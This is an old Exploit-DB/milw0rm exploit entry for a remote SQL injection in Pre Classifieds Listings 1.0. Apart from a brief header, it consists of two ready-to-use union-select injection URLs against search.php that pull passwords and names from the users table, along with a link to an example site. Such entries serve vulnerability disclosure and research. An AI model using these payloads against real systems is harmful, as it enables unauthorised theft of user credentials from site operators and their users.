Pre Classifieds Listings 1.0 - SQL Injection

EDB-ID:

3840


Platform:

PHP

Published:

2007-05-03

==============================================

Pre Classifieds Listings v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*

==============================================

Example: http://preproject.com/phppcl/

==============================================

# milw0rm.com [2007-05-03]